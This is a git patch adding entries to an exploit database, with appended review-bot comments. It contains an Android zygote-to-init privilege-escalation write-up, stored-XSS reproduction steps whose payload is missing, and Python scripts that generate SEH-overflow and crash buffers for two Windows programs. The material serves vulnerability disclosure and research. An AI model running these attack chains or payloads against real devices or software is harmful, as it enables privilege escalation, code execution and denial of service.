From d7fa44945250a0e4a7944c8489121bb41df17fbb Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 12 Sep 2018 05:01:53 +0000 Subject: [PATCH] DB: 2018-09-12 7 changes to exploits/shellcodes Zenmap (Nmap) 7.70 - Denial of Service (PoC) HTML5 Video Player 1.2.5 - Denial of Service (PoC) Zenmap (Nmap) 7.70 - Denial of Service (PoC) InTouch Machine Edition 8.1 SP1 - 'Nombre del Tag' Buffer Overflow (SEH) Android - 'zygote->init;' Chain from USB Privilege Escalation Monstra CMS 3.0.4 - Arbitrary File Upload / Remote Code Execution Monstra CMS 3.0.4 - (Authenticated) Arbitrary File Upload / Remote Code Execution CMS Made Simple 2.2.5 - Remote Code Execution CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution OpenEMR < 5.0.1 - Remote Code Execution OpenEMR < 5.0.1 - (Authenticated) Remote Code Execution Jorani Leave Management 0.6.5 - 'startdate' SQL Injection Jorani Leave Management 0.6.5 - (Authenticated) 'startdate' SQL Injection OpenEMR 5.0.1.3 - Arbitrary File Actions OpenEMR 5.0.1.3 - (Authenticated) Arbitrary File Actions WordPress Plugin Gift Voucher 1.0.5 - 'template_id' SQL Injection WordPress Plugin Gift Voucher 1.0.5 - (Authenticated) 'template_id' SQL Injection Bayanno Hospital Management System 4.0 - Cross-Site Scripting --- exploits/android/local/45379.txt | 98 +++++++++++++++++++ exploits/php/webapps/45375.txt | 23 +++++ exploits/windows_x86-64/local/45378.py | 25 +++++ exploits/windows_x86/{local => dos}/45357.txt | 0 exploits/windows_x86/dos/45376.py | 28 ++++++ files_exploits.csv | 18 ++-- 6 files changed, 185 insertions(+), 7 deletions(-) create mode 100644 exploits/android/local/45379.txt create mode 100644 exploits/php/webapps/45375.txt create mode 100755 exploits/windows_x86-64/local/45378.py rename exploits/windows_x86/{local => dos}/45357.txt (100%) create mode 100755 exploits/windows_x86/dos/45376.py diff --git a/exploits/android/local/45379.txt b/exploits/android/local/45379.txt new file mode 100644 index 000000000..4f04e88c6 
--- /dev/null +++ b/exploits/android/local/45379.txt 
@@ -0,0 +1,98 @@ +After reporting https://bugs.chromium.org/p/project-zero/issues/detail?id=1583 +(Android ID 80436257, CVE-2018-9445), I discovered that this issue could also +be used to inject code into the context of the zygote. Additionally, I +discovered a privilege escalation path from zygote to init; that escalation path +is why I'm filing a new bug. + +Essentially, the privilege escalation from zygote to init is possible because +system/sepolicy/private/zygote.te contains the following rule: + + allow zygote self:capability sys_admin; + +(On the current AOSP master branch, the rule looks slightly different, but it's +still there.) + +This rule allows processes in the zygote domain to use the CAP_SYS_ADMIN +capability, if they have such a capability. The zygote has the capability and +uses it, e.g. to call umount() and to install seccomp filters without setting +the NO_NEW_PRIVS flag. CAP_SYS_ADMIN is a bit of a catch-all capability: If +kernel code needs to check that the caller has superuser privileges and none of +the capability bits fit the particular case, CAP_SYS_ADMIN is usually used. +The capabilities(7) manpage has a long, but not exhaustive, list of things that +this capability permits: +http://man7.org/linux/man-pages/man7/capabilities.7.html + +One of the syscalls that can be called with CAP_SYS_ADMIN and don't have +significant additional SELinux hooks is pivot_root(). This syscall can be used +to switch out the root of the current mount namespace and, as part of that, +change the root of every process in that mount namespace to the new namespace +root (unless the process already had a different root). + +The exploit for this issue is in zygote_exec_target.c, starting at +"if (unshare(CLONE_NEWNS))". The attack is basically: + +1. set up a new mount namespace with a root that is fully attacker-controlled +2. execute crash_dump64, causing an automatic transition to the crash_dump + domain +3. 
the kernel tries to load the linker for crash_dump64 from the + attacker-controlled filesystem, resulting in compromise of the crash_dump + domain +4. from the crash_dump domain, use ptrace() to inject syscalls into vold +5. from vold, set up a loop device with an attacker-controlled backing device + and mount the loop device over /sbin, without "nosuid" +6. from vold, call request_key() with a nonexistent key, causing a + usermodehelper invocation to /sbin/request-key, which is labeled as + init_exec, causing an automatic domain transition from kernel to init (and + avoiding the "neverallow kernel *:file { entrypoint execute_no_trans };" + aimed at stopping exploits using usermodehelpers) +7. code execution in the init domain + + +Note that this is only one of multiple possible escalation paths; for example, +I think that you could also enable swap on an attacker-controlled file, then +modify the swapped-out data to effectively corrupt the memory of any userspace +process that hasn't explicitly locked all of its memory into RAM. + + + +In order to get into the zygote in the first place, I have to trigger +CVE-2018-9445 twice: + +1. Use the bug to mount a "public volume" with a FAT filesystem over /data/misc. +2. Trigger the bug again with a "private volume" with a dm-crypt-protected + ext4 filesystem that will be mounted over /data. To decrypt the volume, a key + from /data/misc/vold/ is used. +3. Cause system_server to crash in order to trigger a zygote reboot. 
For this, + the following exception is targeted: + + *** FATAL EXCEPTION IN SYSTEM PROCESS: NetworkStats + java.lang.NullPointerException: Attempt to get length of null array + at com.android.internal.util.FileRotator.getActiveName(FileRotator.java:309) + at com.android.internal.util.FileRotator.rewriteActive(FileRotator.java:183) + at com.android.server.net.NetworkStatsRecorder.forcePersistLocked(NetworkStatsRecorder.java:300) + at com.android.server.net.NetworkStatsRecorder.maybePersistLocked(NetworkStatsRecorder.java:286) + at com.android.server.net.NetworkStatsService.performPollLocked(NetworkStatsService.java:1194) + at com.android.server.net.NetworkStatsService.performPoll(NetworkStatsService.java:1151) + at com.android.server.net.NetworkStatsService.-wrap3(Unknown Source:0) + at com.android.server.net.NetworkStatsService$HandlerCallback.handleMessage(NetworkStatsService.java:1495) + at android.os.Handler.dispatchMessage(Handler.java:102) + at android.os.Looper.loop(Looper.java:164) + at android.os.HandlerThread.run(HandlerThread.java:65) + + This exception can be triggered by sending >=2MiB (mPersistThresholdBytes) of + network traffic to the device, then either waiting for the next periodic + refresh of network stats or changing the state of a network interface. + +4. The rebooting zygote64 does dlopen() on + /data/dalvik-cache/arm64/system@framework@boot.oat, resulting in code + execution in the zygote64. (For the zygote64 to get to this point, it's + sufficient to symlink + /data/dalvik-cache/arm64/system@framework@boot.{art,vdex} to their + counterparts on /system, even though that code isn't relocated properly.) + +I have attached an exploit for the full chain, with usage instructions in USAGE. + +WARNING: As always, this exploit is intended to be used only on research devices that don't store user data. This specific exploit is known to sometimes cause data corruption. 
+ +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/45379.zip \ No newline at end of file diff --git a/exploits/php/webapps/45375.txt b/exploits/php/webapps/45375.txt new file mode 100644 index 000000000..7270ff82d --- /dev/null +++ b/exploits/php/webapps/45375.txt @@ -0,0 +1,23 @@ +# Exploit Title: Bayanno Hospital Management System 4.0 - Cross-Site Scripting +# Date: 2018-09-05 +# Software Link: https://codecanyon.net/item/bayanno-hospital-management-system/5814621 +# Exploit Author: Gokhan Sagoglu +# Vendor Homepage:: http://creativeitem.com/ +# Version: v4.0 +# Live Demo: http://creativeitem.com/demo/bayanno/index.php?home +# Category: webapps + +# 1. Description +# Due to improper user input management and lack of output encoding, unauthenticated users are able +# to inject malicious code via making an appointment. Malicious code runs on admin panel. + +# 2. PoC + +- To make an appointment go to: /bayanno/index.php?home/appointment +- Select “New Patient”. +- Type as name. +- Fill the other fields with proper values. +- Click on “Book Now” button. +- Go to admin panel and login as admin: /bayanno/index.php?login +- To view patients go to: /bayanno/index.php?admin/patient +- Malicious script will run. \ No newline at end of file diff --git a/exploits/windows_x86-64/local/45378.py b/exploits/windows_x86-64/local/45378.py new file mode 100755 index 000000000..380605f1a --- /dev/null +++ b/exploits/windows_x86-64/local/45378.py 
@@ -0,0 +1,25 @@ +# Exploit Title: InTouch Machine Edition 8.1 SP1 - 'Nombre del Tag' Buffer Overflow (SEH) +# Discovery by: Luis Martinez +# Discovery Date: 2018-09-10 +# Vendor Homepage: https://on.wonderware.com/ +# Software Link: https://on.wonderware.com/intouch-machine-edition +# Tested Version: 8.1 SP1 +# Vulnerability Type: Local Buffer Overflow (SEH Unicode) +# Tested on OS: Windows 10 Pro x64 en + +# Steps to Produce the Local Buffer Overflow (SEH Unicode): +# 1.- Run python code: InTouch_Machine_Edition_8.1.py +# 2.- Open InTouch_Machine_Edition_8.1.txt and copy content to clipboard +# 3.- Open ITME v8.1 InTouch Machine Edition +# 4.- Inicio +# 5.- Paste ClipBoard on "Nombre del Tag" + +#!/usr/bin/env python + +nSEH = "\x42\x42" +SEH = "\x43\x43" + +buffer = "\x41" * 1042 + nSEH + SEH +f = open ("InTouch_Machine_Edition_8.1.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows_x86/local/45357.txt b/exploits/windows_x86/dos/45357.txt similarity index 100% rename from exploits/windows_x86/local/45357.txt rename to exploits/windows_x86/dos/45357.txt diff --git a/exploits/windows_x86/dos/45376.py b/exploits/windows_x86/dos/45376.py new file mode 100755 index 000000000..e290b8e55 --- /dev/null +++ b/exploits/windows_x86/dos/45376.py 
@@ -0,0 +1,28 @@ +# Exploit Title: HTML5 Video Player 1.2.5 - Denial of Service (PoC) +# Date: 2018-09-07 +# Exploit Author: T3jv1l +# Vendor Homepage: http://www.html5videoplayer.net/download.html +# Software: http://www.html5videoplayer.net/html5videoplayer-setup.exe +# Contact: https://twitter.com/T3jv1l +# Version: HTML5 Video Player V.1.2.5 +# Tested on: Windows 7 SP1 x86 + +# PoC: +# 1. Download and install the setup file +# 2. A file "Evil.txt" will be created +# 3. Click Help > Register... in tool bar +# 4. Copy the contents of the file (poc.txt) and paste in the Registration Name field +# 5. Click Activate and BOOMMMM !!!! + +#!/usr/bin/python + +buffer = "\x41" * 4000 +payload = buffer +try: + f=open("poc.txt","w") + print "[+] Creating %s bytes payload..." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index fe401ae36..26463c35f 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
@@ -6095,6 +6095,8 @@ id,file,description,date,author,type,platform,port 45320,exploits/windows/dos/45320.py,"Microsoft Windows Explorer Out-of-Bound Read - Denial of Service (PoC)",2018-09-03,Ghaaf,dos,windows, 45321,exploits/ios/dos/45321.py,"Trend Micro Virtual Mobile Infrastructure 5.5.1336 - 'Server address' Denial of Service (PoC)",2018-09-03,"Luis Martínez",dos,ios, 45324,exploits/windows/dos/45324.py,"Wikipedia 12.0 - Denial of Service (PoC)",2018-09-03,0xB9,dos,windows, +45357,exploits/windows_x86/dos/45357.txt,"Zenmap (Nmap) 7.70 - Denial of Service (PoC)",2018-09-10,"Gionathan Reale",dos,windows_x86, +45376,exploits/windows_x86/dos/45376.py,"HTML5 Video Player 1.2.5 - Denial of Service (PoC)",2018-09-11,T3jv1l,dos,windows_x86, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, 
@@ -9945,9 +9947,10 @@ id,file,description,date,author,type,platform,port 45354,exploits/windows/local/45354.txt,"Microsoft Baseline Security Analyzer 2.3 - XML External Entity Injection",2018-09-10,hyp3rlinx,local,windows, 45355,exploits/windows_x86/local/45355.py,"Flash Slideshow Maker Professional 5.20 - Buffer Overflow (SEH)",2018-09-10,"Shubham Singh",local,windows_x86, 45356,exploits/windows_x86/local/45356.py,"Any Sound Recorder 2.93 - Denial of Service (PoC)",2018-09-10,T3jv1l,local,windows_x86, -45357,exploits/windows_x86/local/45357.txt,"Zenmap (Nmap) 7.70 - Denial of Service (PoC)",2018-09-10,"Gionathan Reale",local,windows_x86, 45369,exploits/linux/local/45369.rb,"Ghostscript - Failed Restore Command Execution (Metasploit)",2018-09-10,Metasploit,local,linux, 45372,exploits/linux/local/45372.txt,"VirtualBox 5.2.6.r120293 - VM Escape",2018-08-28,"Reno Robert",local,linux, +45378,exploits/windows_x86-64/local/45378.py,"InTouch Machine Edition 8.1 SP1 - 'Nombre del Tag' Buffer Overflow (SEH)",2018-09-11,"Luis Martínez",local,windows_x86-64, +45379,exploits/android/local/45379.txt,"Android - 'zygote->init;' Chain from USB Privilege Escalation",2018-09-11,"Google Security Research",local,android, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 
@@ -39419,7 +39422,7 @@ id,file,description,date,author,type,platform,port 43343,exploits/cgi/webapps/43343.py,"ITGuard-Manager 0.0.0.1 - Remote Code Execution",2017-12-15,"Nassim Asrir",webapps,cgi, 43346,exploits/php/webapps/43346.txt,"Movie Guide 2.0 - SQL Injection",2017-12-15,"Ihsan Sencan",webapps,php,80 43347,exploits/php/webapps/43347.txt,"Ciuis CRM 1.0.7 - SQL Injection",2017-12-18,"Zahid Abbasi",webapps,php, -43348,exploits/php/webapps/43348.txt,"Monstra CMS 3.0.4 - Arbitrary File Upload / Remote Code Execution",2017-12-18,"Ishaq Mohammed",webapps,php, +43348,exploits/php/webapps/43348.txt,"Monstra CMS 3.0.4 - (Authenticated) Arbitrary File Upload / Remote Code Execution",2017-12-18,"Ishaq Mohammed",webapps,php, 43349,exploits/php/webapps/43349.txt,"Cells Blog 3.5 - 'bgid' / 'fmid' / 'fnid' SQL Injection",2017-12-18,"Ihsan Sencan",webapps,php, 44158,exploits/php/webapps/44158.txt,"Joomla! Component CW Tags 2.0.6 - SQL Injection",2018-02-22,"Ihsan Sencan",webapps,php, 44159,exploits/php/webapps/44159.txt,"Joomla! Component Proclaim 9.1.1 - Backup File Download",2018-02-22,"Ihsan Sencan",webapps,php, 
@@ -39800,7 +39803,7 @@ id,file,description,date,author,type,platform,port 44964,exploits/php/webapps/44964.txt,"Dolibarr ERP/CRM < 7.0.3 - PHP Code Injection",2018-07-02,om3rcitak,webapps,php,80 44973,exploits/lua/webapps/44973.py,"ntop-ng < 3.4.180617 - Authentication Bypass",2018-07-03,"Ioannis Profetis",webapps,lua, 44975,exploits/java/webapps/44975.py,"ManageEngine Exchange Reporter Plus < Build 5311 - Remote Code Execution",2018-07-04,"Kacper Szurek",webapps,java,8181 -44976,exploits/php/webapps/44976.py,"CMS Made Simple 2.2.5 - Remote Code Execution",2018-07-04,"Mustafa Hasan",webapps,php, +44976,exploits/php/webapps/44976.py,"CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution",2018-07-04,"Mustafa Hasan",webapps,php, 44977,exploits/php/webapps/44977.txt,"Online Trade - Information Disclosure",2018-07-04,L0RD,webapps,php, 44978,exploits/php/webapps/44978.txt,"ShopNx - Arbitrary File Upload",2018-07-04,L0RD,webapps,php, 45014,exploits/php/webapps/45014.txt,"WAGO e!DISPLAY 7300T - Multiple Vulnerabilities",2018-07-13,"SEC Consult",webapps,php,80 
@@ -39813,7 +39816,7 @@ id,file,description,date,author,type,platform,port 44999,exploits/linux/webapps/44999.txt,"Elektronischer Leitz-Ordner 10 - SQL Injection",2018-07-10,"Jens Regel",webapps,linux, 45002,exploits/hardware/webapps/45002.py,"D-Link DIR601 2.02 - Credential Disclosure",2018-07-10,"Thomas Zuk",webapps,hardware, 45003,exploits/php/webapps/45003.txt,"Instagram-Clone Script 2.0 - Cross-Site Scripting",2018-07-11,L0RD,webapps,php, -45161,exploits/php/webapps/45161.py,"OpenEMR < 5.0.1 - Remote Code Execution",2018-08-07,"Cody Zacharias",webapps,php,80 +45161,exploits/php/webapps/45161.py,"OpenEMR < 5.0.1 - (Authenticated) Remote Code Execution",2018-08-07,"Cody Zacharias",webapps,php,80 45007,exploits/multiple/webapps/45007.txt,"Dicoogle PACS 2.5.0 - Directory Traversal",2018-07-11,"Carlos Avila",webapps,multiple, 45065,exploits/hardware/webapps/45065.txt,"GeoVision GV-SNVR0811 - Directory Traversal",2018-07-22,"Berk Dusunur",webapps,hardware, 45030,exploits/hardware/webapps/45030.txt,"VelotiSmart WiFi B-380 Camera - Directory Traversal",2018-07-16,"Miguel Mendez Z",webapps,hardware,80 
@@ -39852,7 +39855,7 @@ id,file,description,date,author,type,platform,port 45090,exploits/linux/webapps/45090.txt,"Kirby CMS 2.5.12 - Cross-Site Request Forgery (Delete Page)",2018-07-26,"Zaran Shaikh",webapps,linux, 45094,exploits/linux/webapps/45094.txt,"Online Trade 1 - Information Disclosure",2018-07-27,Dhamotharan,webapps,linux, 45338,exploits/php/webapps/45338.txt,"Jorani Leave Management 0.6.5 - Cross-Site Scripting",2018-09-06,"Javier Olmedo",webapps,php,80 -45340,exploits/php/webapps/45340.txt,"Jorani Leave Management 0.6.5 - 'startdate' SQL Injection",2018-09-06,"Javier Olmedo",webapps,php,80 +45340,exploits/php/webapps/45340.txt,"Jorani Leave Management 0.6.5 - (Authenticated) 'startdate' SQL Injection",2018-09-06,"Javier Olmedo",webapps,php,80 45341,exploits/linux/webapps/45341.py,"Apache Roller 5.0.3 - XML External Entity Injection (File Disclosure)",2018-09-06,"Marko Jokic",webapps,linux, 45342,exploits/hardware/webapps/45342.txt,"WirelessHART Fieldgate SWG70 3.0 - Directory Traversal",2018-09-06,"Hamit CİBO",webapps,hardware, 45097,exploits/php/webapps/45097.txt,"SoftNAS Cloud < 4.0.3 - OS Command Injection",2018-07-27,"Core Security",webapps,php, 
@@ -39892,7 +39895,7 @@ id,file,description,date,author,type,platform,port 45196,exploits/windows/webapps/45196.rb,"Oracle GlassFish Server Open Source Edition 4.1 - Path Traversal (Metasploit)",2018-08-14,Metasploit,webapps,windows,4848 45198,exploits/linux/webapps/45198.rb,"Oracle Glassfish OSE 4.1 - Path Traversal (Metasploit)",2018-08-14,"Dhiraj Mishra",webapps,linux, 45200,exploits/cgi/webapps/45200.txt,"ASUSTOR ADM 3.1.0.RFQ3 - Remote Command Execution / SQL Injection",2018-08-15,"Kyle Lovett",webapps,cgi,8001 -45202,exploits/linux/webapps/45202.txt,"OpenEMR 5.0.1.3 - Arbitrary File Actions",2018-08-16,"Joshua Fam",webapps,linux, +45202,exploits/linux/webapps/45202.txt,"OpenEMR 5.0.1.3 - (Authenticated) Arbitrary File Actions",2018-08-16,"Joshua Fam",webapps,linux, 45201,exploits/hardware/webapps/45201.txt,"ASUS-DSL N10 1.1.2.2_17 - Authentication Bypass",2018-08-15,AmnBAN,webapps,hardware, 45206,exploits/php/webapps/45206.txt,"WordPress Plugin Export Users to CSV 1.1.1 - CSV Injection",2018-08-16,"Javier Olmedo",webapps,php, 45208,exploits/php/webapps/45208.txt,"Pimcore 5.2.3 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2018-08-16,"SEC Consult",webapps,php,80 
@@ -39913,7 +39916,7 @@ id,file,description,date,author,type,platform,port 45252,exploits/hardware/webapps/45252.txt,"Vox TG790 ADSL Router - Cross-Site Request Forgery (Add Admin)",2018-08-24,cakes,webapps,hardware, 45253,exploits/php/webapps/45253.txt,"UltimatePOS 2.5 - Remote Code Execution",2018-08-25,"Renos Nikolaou",webapps,php, 45254,exploits/windows/webapps/45254.txt,"ManageEngine ADManager Plus 6.5.7 - HTML Injection",2018-08-25,"Ismail Tasdelen",webapps,windows, -45255,exploits/php/webapps/45255.txt,"WordPress Plugin Gift Voucher 1.0.5 - 'template_id' SQL Injection",2018-08-26,"Renos Nikolaou",webapps,php,80 +45255,exploits/php/webapps/45255.txt,"WordPress Plugin Gift Voucher 1.0.5 - (Authenticated) 'template_id' SQL Injection",2018-08-26,"Renos Nikolaou",webapps,php,80 45256,exploits/windows_x86-64/webapps/45256.txt,"ManageEngine ADManager Plus 6.5.7 - Cross-Site Scripting",2018-08-26,"Ismail Tasdelen",webapps,windows_x86-64,8080 45258,exploits/php/webapps/45258.txt,"Gleez CMS 1.2.0 - Cross-Site Request Forgery (Add Admin)",2018-08-27,GunEggWang,webapps,php,443 45264,exploits/hardware/webapps/45264.txt,"RICOH MP C4504ex Printer - Cross-Site Request Forgery (Add Admin)",2018-08-27,"Ismail Tasdelen",webapps,hardware,80 @@ -39944,3 +39947,4 @@ id,file,description,date,author,type,platform,port 45348,exploits/hardware/webapps/45348.txt,"QNAP Photo Station 5.7.0 - Cross-Site Scripting",2018-09-07,"Mitsuaki Shiraishi",webapps,hardware, 45351,exploits/hardware/webapps/45351.py,"LW-N605R 12.20.2.1486 - Remote Code Execution",2018-09-10,"Nassim Asrir",webapps,hardware, 45361,exploits/linux/webapps/45361.py,"RPi Cam Control < 6.4.25 - 'preview.php' Remote Command Execution",2018-09-04,"Reigning Shells",webapps,linux, +45375,exploits/php/webapps/45375.txt,"Bayanno Hospital Management System 4.0 - Cross-Site Scripting",2018-09-11,"Gokhan Sagoglu",webapps,php,
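Review bot: exploits/android/local/45379.txt has no metadata header and points at material that is not in the file. The text refers to zygote_exec_target.c and to "usage instructions in USAGE", both of which exist only in the linked 45379.zip, and unlike the other new entries in this commit it carries no title, author, date or tested-version block. Suggest a short header naming the source report, the affected build or patch level the author tested, and a line saying the two referenced files are inside the archive, so the write-up can be triaged without downloading the binary. The file also ends without a trailing newline.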
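Review bot: in exploits/php/webapps/45375.txt, the third PoC step reads "Type as name." with nothing between "Type" and "as", so the reproduction steps cannot be followed or verified as written. If the value was dropped by markup stripping on ingestion, store it escaped as plain text in the .txt. Smaller points in the same hunk: "# Vendor Homepage::" has a doubled colon, the header gives no tested environment, and the file ends without a trailing newline.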
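Review bot: in exploits/windows_x86-64/local/45378.py, the "#!/usr/bin/env python" line sits after the comment header instead of on line 1, so it has no effect even though the file is added with mode 100755; move it to the first line or drop the executable bit. Also worth stating in the header: nSEH and SEH are the filler values "\x42\x42" and "\x43\x43", so the script shows the handler overwrite only, and the header spells the author "Luis Martinez" while the files_exploits.csv row uses "Luis Martínez". The output file is opened without a context manager and the file has no trailing newline.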
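Review bot: the PoC steps in exploits/windows_x86/dos/45376.py contradict the code. Step 2 says a file "Evil.txt" will be created, but the script writes "poc.txt" (which step 4 then refers to), and no step says to run the script at all. Align the file name and add the missing step. The bare "except:" hides the real I/O error behind "File cannot be created"; catching IOError and printing it would be more useful. The print statements are Python 2 only, which the header should state, and the shebang is not on line 1 although the mode is 100755.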
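Review bot: in the files_exploits.csv hunk at -6095, the new row for 45376 records 2018-09-11, while the header of 45376.py in this same commit gives "Date: 2018-09-07". If the CSV column is the publication date, that is fine but should be documented; otherwise the two should agree. The same question applies to 45378 in the -9945 hunk (header "Discovery Date: 2018-09-10", CSV 2018-09-11).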
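Review bot: in the files_exploits.csv hunk at -9945, the description for 45379 is "Android - 'zygote->init;' Chain from USB Privilege Escalation", with a semicolon inside the quotes after "init". That reads like residue from an HTML entity for ">" that was only half decoded; the write-up itself says "zygote to init". Suggest 'zygote->init' in the CSV row and in the commit subject, since this string is what searches against the index will match.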
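Review bot: the hunk at -39419 (and likewise the five other hunks that insert "(Authenticated)" into a description) changes only the CSV title. The diffstat lists six files and none of 43348.txt, 44976.py, 45161.py, 45340.txt, 45202.txt or 45255.txt is among them, so any title line inside those files will now differ from the index. Either update the in-file titles in the same commit or note that the CSV description is the authoritative one. The relabel itself is useful for triage, since it tells defenders the issue needs a valid session.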